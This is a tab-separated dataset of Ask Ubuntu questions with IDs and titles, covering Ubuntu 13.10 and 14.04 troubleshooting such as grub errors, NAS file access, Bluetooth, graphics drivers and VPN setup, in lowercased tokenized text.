450324	kdeconnect not showing up in the list of programs in ubuntu 14.04	kde-connect is available to install from software center in ubuntu 14.04 but not showing up in the menu or search . i am using gnome shell on running in terminal as gksu kdeconnect i am getting following error : /home/parashar/.themes/zoncolorxtra-ios/gtk-2.0/style/default.rc:29 : invalid symbolic color 'link_color' /home/parashar/.themes/zoncolorxtra-ios/gtk-2.0/style/default.rc:29 : error : invalid identifier 'link_color ' , expected valid identifier /home/parashar/.themes/zoncolorxtra-ios/gtk-2.0/style/app/app-misc.rc:25 : error : invalid string constant `` treeview_header '' , expected valid string constant kde connect is the only available app to bridge ubuntu and android ... please help me out with kde connect or please suggest me an alternate app in ubuntu 14.04 if it 's there
450328	can no longer open files on nas via file browser but using web browser works	we have 2 ubuntu pcs ( naida using mate and 13.10 ? using cinnamon ) plus android phones . our files are on an nas , iomega home media network hard drive 2tb uses a linux os i think , that was working fine with automount at boot using cifs and fstab . took me ages to get it right but worked fine on both pcs . we could view and work on files on the nas no problem . the nas connects to a router and then to the pcs couple of days ago we lost the ability to open files on the nas from both ubuntu pcs and android phones . the errors were different on each device . but using a web browser we can view/hear media fine . my husbands pc , cinnamon , could open a couple of pictures then hung the whole pc on nadia - can view the folder and files but when tried to open picture with gthumb and suddenly it was copying it to a temp file and then gthumb hung . using dolphin - tries to open then hangs using caja - got this error trying to play music could not display smb : //192.168.0.101/music/music name error : timeout was reached please select another viewer and try again '' then with caja could not open the folder and got this error '' the folder content could not be displayed . sorry , could not display all the contents of `` pictures on 192.168.0.101 '' : invalid > argument '' this is having tried several times before , initially i could open a folder . android phone - can view folders and files but if try to play music it just never starts and error connecting to server ... .. but if i browse using a web browser to the nas , i can open the folder and open and view the pictures , or play the music fine . have looked on the net and found one or two with similar problem but no answer . please help , i do n't know what is going on . thank you for your time
450329	after upgrade to ubuntu 13.10 , firefox sometimes crashes the computer	the previous ubuntu was 12.04 when firefox worked fine . the computer is an hp pavilion dv4 laptop and now is upgraded to ubuntu 13.10 , firefox v28.0 , canonical-1.0 . firefox may run for sometime then suddenly a message that firefox has crashed appears or the machine simply shows a black screen of death with terminal like output mentioning things like , '' kernel panic-not syncing : fatal exchange in interrupt '' , call trace : with lines like `` smp_apic timer__interupt+ox34/ox3c '' and `` ? poll_select_copy remaining +ox100/ox100 '' and '' code : ( followed by multiple pairs of hex values ) '' and `` shutting down cpus with nmi '' and finally , '' drm_kms_helper : panic occurred , switching back to text console . a system 's test pronounces the harddrive , ram memory , cpu and video drivers are fine . to recover the situation , i have to do a coldstart using the power button . on other occasions , firefox and the cursor just freezes without the black screen of death but a cold restart is still required . do i need to go back to version 12.04 ? should i upgrade to version 14.04 ? i have done a crash report as sometimes the window says , module 'xorg ' is at fault but have gotten no reply . any help appreciated ... ..
450336	problem with asus touchpad and a4tech numeric keypad	i have an asus x450l ( 14 '' ) and fn + numlock does n't work on ubuntu 13.10 so i bought an a4tech numeric keypad but it does n't work , ,does anyone knows how to get it working or any drivers for that external numpad to install ? ? and also its touchpad does n't work at all .
450337	apt dependency issues in trusty	i was trying to install openssh-server on xubuntu 14.04 [ amd64 ] and apt is asking me to install many i386 packages as dependency the following packages will be removed : openssh-client the following new packages will be installed : gcc-4.9-base : i386 libc6 : i386 libck-connector0 libcomerr2 : i386 libedit2 : i386 libgcc1 : i386 libgssapi-krb5-2 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libpcre3 : i386 libselinux1 : i386 libssl1.0.0 : i386 libtinfo5 : i386 ncurses-term openssh-client : i386 openssh-server openssh-sftp-server ssh-import-id zlib1g : i386 my questions are , why apt is asking me to install i386 packages even though am running on amd64 ? why gcc-4.9-base : i386 is required , already gcc-4.9-base is installed along with gcc-4.9-base ? the complete terminal output is pasted at http : //paste.ubuntu.com/7281225/ list of installed packages : http : //paste.ubuntu.com/7281453/ in addition to default xubuntu 14.04 amd64 installation ppa : webupd8team/java and ppa : lttng/ppa are added .
450338	how to recover windows laptop hard drive using ubuntu live stick	i would like to recover the hard drive on my laptop which had windows 7 but was formatted . assuming i have an ubuntu live usb stick , how can i unformat the laptop 's drive ? notice i rather not open the laptop and extract the hard drive .
450339	how can i know before hand the amount of data downloaded when upgrading from one release to the next	i am about to update my ubuntu 13.10 to 14.04 what is the total size of the files that will be downloaded for the upgrade ?
450343	is there anyway to restore lost files ( in downloads ) due to power outage while transfering to external ?	i was busy transferring some files from my downloads directory to my external hard-drive . unexpectedly , the power on my computer went out , and the entire contents of my downloads directory was wiped clean . is there any way to restore these files ? my system files all seeem fine , and i 'm using ubuntu 12.04 . could it be some form of virus ? ( i am dual-booting with windows , and transfer files between the two ... ) is it possible that i installed something i should n't have while trying to set-up a package ? please , any help would be appreciated ! i need some of these files urgently for work ! thank you janco
450345	failed to bring up eth1	we try to implement the ubuntu server as gateway . there are two nic cards . one is for internet and another is for lan . eth0 is up but eth1 is failed to up . i need to configure eth0 as address 172.16.1.200 subnet mask : 255.255.255.0 default gateway : 172.16.1.1 dns server : 172.16.1.1 and i need to configure eth1 as address 192.168.21.1 mask : 255.255.255.0 gateway : 192.168.21.1 please help me
450346	kde desktop - handling shared applications & icons	i am using the kde 4.8 desktop with the ubuntu 14.04 lts . i have made two separate virtual desktops on it with different wallpapers on each . i want to share all applications with the exception of the firefox browser which i have set separately for each desktop to prevent it from closing out all open windows on other desktops when i close the last window on the current one . can i share some applications like that while not sharing others ? if so , then why when i set a application icon for a shared application on one of the virtual desktops does it appears on only the one which i am currently using ? i have to set the application icons for shared applications on each virtual desktop separately ; and even then they keep disappearing from all but the first virtual desktop . am i doing something wrong ?
450347	no battery icon in ubuntu gnome 14.04	i 'm using an asus k56cb laptop and i just upgraded from ubuntu gnome 13.10 to ubuntu gnome 14.04 ( gnome shell 3.10.4 ) however now i do n't have a battery icon in the upper right-hand corner . also the brightness slider is also missing . ( see screen shot ) the battery and power management is present and working ( i can go into power in the setting panel and it detects my battery and tells the level of charge ) i do n't think it 's an acpi problem . things i 've tired from search around the forums : setting org.gnome.settings-daemon.plugins.power.active = true ( did this via dconf-editor ) it was already set to active i 've also tried to re-install gnome-power-management . thanks for any help !
450348	bluetooth not working in ubuntu 14.04	my laptop is sony vpceh15en . in the early releases of ubuntu like 12.04 and 13.10 my bluetooth used to work properly . but now in ubuntu 14.04 it is not working . here is the output of sudo lshw -c network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 01 serial : cc : af:78 : b3 : e5:0f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory:92500000-9250ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : 06 serial : 78:84:3c : e7:0f:5a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory:91404000-91404fff memory:91400000-91403fff *-network description : ethernet interface physical id : 1 logical name : wwan0 serial : fe:66:3d:53:82:83 capabilities : ethernet physical configuration : broadcast=yes driver=qmi_wwan driverversion=22-aug-2005 firmware=wwan/qmi device ip=10.49.48.237 link=yes multicast=yes the output of lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 07:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 0d:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) the ouput of ifconfig eth0 link encap : ethernet hwaddr 78:84:3c : e7:0f:5a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:491 errors:0 dropped:0 overruns:0 frame:0 tx packets:491 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:52829 ( 52.8 kb ) tx bytes:52829 ( 52.8 kb ) wlan0 link encap : ethernet hwaddr cc : af:78 : b3 : e5:0f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) here is the output of lsusb bus 002 device 006 : id 093a:2510 pixart imaging , inc. optical mouse bus 002 device 005 : id 8564:1000 bus 002 device 004 : id 0b38:0010 gear head 107-key keyboard bus 002 device 008 : id 12d1:1436 huawei technologies co. , ltd. e173 3g modem ( modem-mode ) bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 003 : id 064e : a302 suyin corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
450349	permissions denied in qgis ( perhaps all kde programs ) ?	encountering a crash when requesting qgis 2.2 to access data on desktop machine . running ubuntu 14.04 lts . running qgis desktop as root via the terminal does allow me to open files ! but it also pops up with an error message immediately after the program runs ( ie after the initial loading/welcome graphic dissapears ) : the layer /usr/share/applications/ % f is not a valid layer and can not be added to the map any idea how i can make qgis operate from gui ( unity ) with root privileges without having to open it via terminal and adding the sudo prefix ? i have attempted the solution provided below by edm , but the open window hangs and i recieve errors pertaining to klauncher : could not start process can not talk to klauncher : not connected to d-bus server . how to launch application as root from unity launcher ? it might be that my kde profile has been corrupted . any ideas how i can rectify this so that i can run qgis from unity ? i 'm still a beginner at this , so please provide any instructions should i require to post more command outputs . $ qgis warning : loading of qt translation failed [ /usr/share/qt4/translations/qt_en_au ] qgis.bin ( 32381 ) /kshareddatacache kshareddatacache : :private : :mapsharedmemory : failed to establish shared memory mapping , will fallback to private memory -- memory usage will increase kbuildsycoca4 running ... kbuildsycoca4 : error creating database '/home/lyndon/.kde/cache-gerhard-thinkpad-w530/ksycoca4 ' ! insufficient permissions in target directory . warning : error : running ksycoca failed . qgis died on signal 11ptrace : operation not permitted . no thread selected no stack . gdb returned 0 aborted ( core dumped ) ' any request , such as opening a file , browsing , creating a new project etc . will cause this crash . output of : sudo ls -l /home/lyndon/.kde/cache-gerhard-thinkpad-w530/ total 10320 -rw-r -- r -- 1 root root 10547304 apr 25 2013 icon-cache.kcache â running the program by root ( via terminal ) works . but a new error occurs : $ sudo qgis % f warning : loading of qt translation failed [ /usr/share/qt4/translations/qt_en_au ] error : `` /tmp/kde-lyndon '' is owned by uid 1000 instead of uid 0 . error : `` /tmp/ksocket-lyndon '' is owned by uid 1000 instead of uid 0 . error : `` /tmp/kde-lyndon '' is owned by uid 1000 instead of uid 0. kdeinit4 : shutting down running client . connecting to deprecated signal qdbusconnectioninterface : :serviceownerchanged ( qstring , qstring , qstring ) error : `` /tmp/ksocket-lyndon '' is owned by uid 1000 instead of uid 0 . error : `` /tmp/kde-lyndon '' is owned by uid 1000 instead of uid 0 . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kbuildsycoca4 running ... kbuildsycoca4 ( 8139 ) vfoldermenu : :loaddoc : parse error in `` /home/lyndon/.config/menus/applications-merged/xdg-desktop-menu-dummy.menu '' , line 1 , col 1 : `` unexpected end of file '' kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :init : the desktop entry file `` /usr/share/applications/evolution-data-server-uoa.desktop '' has type= `` application '' but no exec line kbuildsycoca4 ( 8139 ) kbuildservicefactory : :createentry : invalid service : `` /usr/share/applications/evolution-data-server-uoa.desktop '' kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s0 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s1 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s2 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s3 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s4 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s5 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s6 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s7 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s8 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s9 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :parseactions : the desktop file `` /usr/share/applications/launchpadlaunchpadnet.desktop '' references the action `` s10 '' but does n't define it kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :init : the desktop entry file `` /usr/share/applications/unity-scope-gdrive.desktop '' has type= `` application '' but no exec line kbuildsycoca4 ( 8139 ) kbuildservicefactory : :createentry : invalid service : `` /usr/share/applications/unity-scope-gdrive.desktop '' kbuildservicefactory : :createentry : invalid service : `` /usr/share/applications/updf.desktop '' kbuildsycoca4 ( 8139 ) /kdecore ( services ) kserviceprivate : :init : the desktop entry file `` /usr/share/applications/updf.desktop '' has type= `` application '' instead of `` application '' or `` service '' kbuildsycoca4 ( 8139 ) kbuildservicefactory : :createentry : invalid service : `` /usr/share/applications/updf.desktop '' kbuildsycoca4 ( 8139 ) kbuildservicefactory : :createentry : invalid service : `` /usr/share/applications/unity-lens-photos.desktop '' kbuildsycoca4 ( 8139 ) kdemain : emitting notifydatabasechanged ( `` servicetypes '' , `` xdgdata-mime '' , `` services '' , `` apps '' ) error : `` /tmp/kde-lyndon '' is owned by uid 1000 instead of uid 0 . warning : object : :connect : no such signal org : :freedesktop : :upower : :deviceadded ( qdbusobjectpath ) warning : object : :connect : no such signal org : :freedesktop : :upower : :deviceremoved ( qdbusobjectpath ) error : `` /tmp/ksocket-lyndon '' is owned by uid 1000 instead of uid 0 . object : :connect : no such signal org : :freedesktop : :upower : :deviceadded ( qdbusobjectpath ) object : :connect : no such signal org : :freedesktop : :upower : :deviceremoved ( qdbusobjectpath )
450350	how do you use openvpn with these settings ?	client proto udp dev tun remote xxxxxxxx port 1194 # route 0.0.0.0 0.0.0.0 # http-proxy-retry route-method exe route-delay 2 keepalive 3 15 resolv-retry infinite nobind persist-key persist-tun auth none comp-lzo verb 3 cipher none auth-user-pass tun-mtu 1500 tun-mtu-extra 32 mssfix 1450
450352	activated the wrong graphics driver for amd 7xxx series in ubuntu	i have ubuntu 12.04 installed on my laptop.i kept on updating it and installing new softwares including gnu radio companion throughout the previous night as my connection was slow.after a night struggle mistakenly activated the wrong graphics driver ( fglrx ) for my amd 7xxx series graphics card and it gets weird ... now when i starts ubuntu i get a blank screen.please help me out of this and please do n't tell me to reinstall ubuntu ? ?
450354	putting a full installation of lubuntu on a usb drive	i am trying to install a full lubuntu installation on a usb drive . i 've tried a number of different methods , but they all seem to fail in some way or another . first of all , i do n't have a native ubuntu computer ; i have a netbook with 1gb of memory that i can boot in to lubuntu from a live cd , as well as a windows pc . i do n't want a live installation of some sort ; i want it to act like a normal installation , just it should be completely independent of it 's host . i was thinking of trying to run a vm using the drive as it 's hard drive and installing it like that , but the lubuntu-able netbook does n't have enough memory . my pc could do it , but i usually use hyper-v for virtualization , and from what i remember i could never get it to register a usb drive in the vm . basically , is there a way to install lubuntu to a specific drive and make sure it does n't touch any other devices ? if not , what 's the best way to accomplish this with the equipment that i have available ?
450355	rectangle with cross on title bar	i have installed ubuntu 14.04 and i think that i have found a bug . when i open terminal and go to edit profile preferences i get a rectangle with a cross on the title bar . it happened with other applications too . here are the screen shots :
450358	ubuntu 14.04 installer not detecting windows 7 i already have four primary partitions	i recently downloaded ubuntu 14.04 trust tahr and created a bootable usb stick with the .iso image on it . when i choose the usb stick as the boot device it takes me to the ubuntu installer gui . however , once it gets to the actual installation step , it says `` this computer currently has no detected operating system '' so i did some searching around and only found some questions that had complicated answers about partitions , etc . partitions are new to me , and i only have a basic understanding of them . so could someone please provide a fairly simple answer ? i 'd really appreciate it . i 've been looking forward to getting ubuntu for a long time and am anxious to get this working . thanks !
450361	13.10 ca n't update grub because of 'syntax errors ' and 'incorrect command ' inside default file	i wanted to skip the grub menu on startup , so i edited the file to remove it , and when i tried to update it i got an error message . so i put it back to the way it was , and update that , and that also gives me the following error : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-19-generic found initrd image : /boot/initrd.img-3.11.0-19-generic found linux image : /boot/vmlinuz-3.11.0-18-generic found initrd image : /boot/initrd.img-3.11.0-18-generic found linux image : /boot/vmlinuz-3.11.0-17-generic found initrd image : /boot/initrd.img-3.11.0-17-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found windows recovery environment ( loader ) on /dev/sda1 skipping windows recovery environment ( loader ) on wubi system found windows 7 ( loader ) on /dev/sda2 skipping windows 7 ( loader ) on wubi system error : syntax error . error : incorrect command . error : syntax error . error : incorrect command . error : syntax error . syntax error at line 132 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached.done my /etc/default/grub file is as follow : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' and i tried adding the following because i read online it fixed something , but it 's had no effect : # fix broken grub.cfg gen grub_disable_submenu=y thanks for any help in advance .
450362	unable to access internal hdd using ubuntu 14 , says unable to mount volume	dual booting windows 8 & ubuntu 14 , i can access my internal drives from win 8 but can not access them from ubuntu 14. says unable to mount !
450363	lubuntu 14.04 can not try lubuntu without installing-error messages	i have lubuntu 13.10 installed . works great . i downloaded lubuntu 14.04 and burned to disc . to test i tried the option to try lubuntu without installing . i got several error messages which i did not understand . the first error message contained the following : '' kernel panic-not syncing '' there were other error messages that followed plus a lot of codes . then the last error message contained the following : '' drm_kms_helper : panic occurred switching back to text console '' i had to cold reboot . nothing worked . computer completely froze including t he keyboard , mouse and i could not even eject the disc until the cold reboot . this did not happen with 13.10 which installed smoothly with no problems 6 months ago . sounds to me like a kernel problem although i would think it would work just to try lubuntu without installing . i remember trying a pre-release kubuntu 14.04 and i was able to try it without installing just fine . is there a fix or should i attempt to download the image again and re-burn to disc . please advise if possible . i was very suprised it did not work considering lubuntu 13.10 and a pre-release kubuntu 14.04 worked . thank you in advance for any assistance .
450364	the -- disk-module=module option of grub-install do n't work in ubuntu 14.04	my os is ubuntu14.04 . and the command grub-install -v shows that the grub version is grub 2.02~beta2-9 . since i have two disk on my laptop , and one of them is not bootable , i have to use nativedisk option . but the -- disk-module=module option of grub-install can not work normaly . command like : sudo grub-install -- disk-module=native /dev/sda returns me the following message : -- disk-module : ( program error ) option should have been recognized ! ? try 'grub-install -- help ' or 'grub-install -- usage ' for more information . grub ( -install ) 2.00 in ubuntu13.10 do n't have this bug . is there any way to fix it ? here is the output of sudo fdisk -l , /dev/sdb is not bootable : disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = 扇区 of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x27cd3b50 设备 启动 起点 终点 块数 id 系统 /dev/sda1 * 2048 250066943 125032448 7 hpfs/ntfs/exfat disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = 扇区 of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xad250a1f 设备 启动 起点 终点 块数 id 系统 /dev/sdb1 * 64 209718392 104859164+ 7 hpfs/ntfs/exfat /dev/sdb2 209718406 976771071 383526333 f w95 扩展 ( lba ) /dev/sdb5 209718408 419439415 104860504 7 hpfs/ntfs/exfat /dev/sdb6 419439480 829968431 205264476 7 hpfs/ntfs/exfat /dev/sdb7 829970432 830359551 194560 83 linux /dev/sdb8 830361600 888952831 29295616 83 linux /dev/sdb9 888954880 894812159 2928640 82 linux 交换 / solaris /dev/sdb10 894814208 976771071 40978432 83 linux
450365	moka gtk theme not being applied	i am trying to get the moka theme on my computer and am running ubuntu 13.10 i have got the icon theme to run but somehow i can not see the moka theme in unity-tweak-tool can someone please help me out ?
450367	what the difference between 'ip -6 route ' and 'route -a inet6 ' ?	i use the following commands to add a default route entry whose next hop is fe80 : :20c:29ff : fe75 : b579 : sudo route -a inet6 add default gw fe80 : :20c:29ff : fe75 : b579 dev eth0 sudo ip -6 route add default via fe80 : :20c:29ff : fe75 : b579 dev eth0 then , i use 'route -a inet6 ' to display the route table : i found there 's two of them , only metric is different : kernel ipv6 routing table destination next hop flag met ref use if fe80 : :/64 : : u 256 0 0 eth0 : :/0 fe80 : :20c:29ff : fe75 : b579 ug 1 0 0 eth0 : :/0 fe80 : :20c:29ff : fe75 : b579 ug 1024 0 0 eth0 and after a few minutes , they both disappeared . who can tell me why ?
450369	how to install juniper vpn on ubuntu 14.04 lts ?	could you please help me ? on my old ubuntu 13.10 i was able to run juniper vpn ( on firefox only ) using a workaround which requires you to install the missing 32libs and icedtea ( 32bits ) . however , i recently upgraded from ubuntu 13.10 to 14.04 ( both 64 bits ) and my juniper vpn does not work anymore because it fails during startup showing the following message : '' please ensure that necessary 32 bit libraries are installed . for more details , refer kb article kb25230 '' '' setup failed . please install 32 bit java and update alternatives links using update-alternatives command . for more details , refer kb article kb25230 '' for some odd reason , it seems the 14.04 upgrade do not work anymore with the openjdk-7:386 and consequently the juniper vpn as well . any ideas ? thanks
450370	maas fails to download the boot images	i cant get maas to download the boot images when i run maas root node-groups import-boot-images all i get is import of boot images started on all cluster controllers and i do n't get any images , same goes for the web ui . any ideas ?
450371	ubuntu 14.04 indicator applet for remaining hdd space ?	i 've looked all over google but have yet to find what i 'm looking for . i just want a simple indicator that shows the remaining hdd space for my drives . does n't need to be fancy because it 's being used on my laptop and i only have 1 hdd .
450372	ubuntu 14.04 empty localhost	i 've just upgraded my system to ubuntu 14.04 . now when i try to access localhost from my browser , it 's just empty ( like there is nothing inside that folder ) . screenshot : /var/www/ folder contains many folders and files , and i can access them from browser using file : ///var/www/filename url .
450373	getting an error when launching update manager	an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . '
450376	having problem with genymotion on virtualbox for 13.10 , its not working on 14.04 , any idea ?	after upgrade ( 13.10 to 14.04 ) i had problem with vmware , it does not support new linux , need to patch files ( now fixed ) , second having problem with genymotion on virtualbox for 13.10 , its not working on 14.04 , any idea ? ďťż
450377	ubuntu gnome menu sizes on high res monitor	i just updated by macbook with ubuntu gnome to 14.04 . however after updating the gnome menu and button sizes seems to have adapted to the highest possible resolution on the system and i ca n't figure out how to fix them . after the system upgrade , the display defaults to 2880x1800 which is way too large for the screen size and results in tiny unreadable pages ( screenshot ) . instead i would like to use a 1680x1050 resolution , however this results in oversized gnome buttons and menus ( screenshot ) . how can i adapt the relative size of the gnome buttons and menu 's within a given resolution so that they are normal sized for lower resolutions ?
450382	xubuntu menulibre application ( menu editor ) not launching	my cat was recently laying on my computer when i was trying to edit the xubuntu menu using the menu editor application ( menulibre ) . my cat messed around with some stuff so when i tried to go back into menulibre to try to fix it , it would not open . i got an error for the first two times that i opened it that said that it quit unexpectedly , but i can not get that again , so i can not say what it said . the rest of the times that i tried to open it , i got no error , so i opened up the task manager , and tried to open it again . i opened it , and it appeared in the task manager for a few seconds in red and then went away . so then i tried to open it from the terminal by typing menulibre and i got this error : ** ( menulibre:2819 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-d2bt58fvxp : connection refused ** error : /build/buildd/gnome-menus-3.10.1/./libmenu/gmenu-tree.c:4022 : preprocess_layout_info : assertion failed : ( ! directory- > preprocessed ) aborted ( core dumped ) thanks in advance : d edit : i have tried restarting my computer multiple times but i have still not gotten a result .
450383	no 3d acceleration in ubuntu 14.04 lts with latest vmware workstation	i installed the latest version of vmware workstation ( 10.0.2 ) in ubuntu 14.04 lts and i have the following problem : i use the open source driver `` radeon '' ( galium 0.4 ) and mesa 10.1.0 . my graphics card : glxinfo | grep opengl opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd rs780 opengl core profile version string : 3.1 ( core profile ) mesa 10.1.0 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 10.1.0 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : lspci -nnk | grep -ia3 vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs780d [ radeon hd 3300 ] [ 1002:9614 ] subsystem : asustek computer inc. device [ 1043:834d ] kernel driver in use : radeon 01:05.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] rs780 hdmi audio [ radeon ( hd ) 3000 series ] [ 1002:960f ] glxinfo | grep -i render direct rendering : yes glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : gallium 0.4 on amd rs780 gl_mesa_texture_signed_rgba , gl_nv_conditional_render , gl_nv_depth_clamp , gl_nv_blend_square , gl_nv_conditional_render , gl_nv_depth_clamp , i tried to install driconf and changed enable s3tc texture compression ... by default is no , and also edited the .vmx file , adding the line : mks.gl.allowblacklisteddrivers = `` true '' but it does n't work . i checked if this package is in my system : libtxc-dxtn-s2tc0 i think it is a free implementation of the texture compression library for mesa . this package is installed by default on trusty . any help would be greatly appreciated best regards .
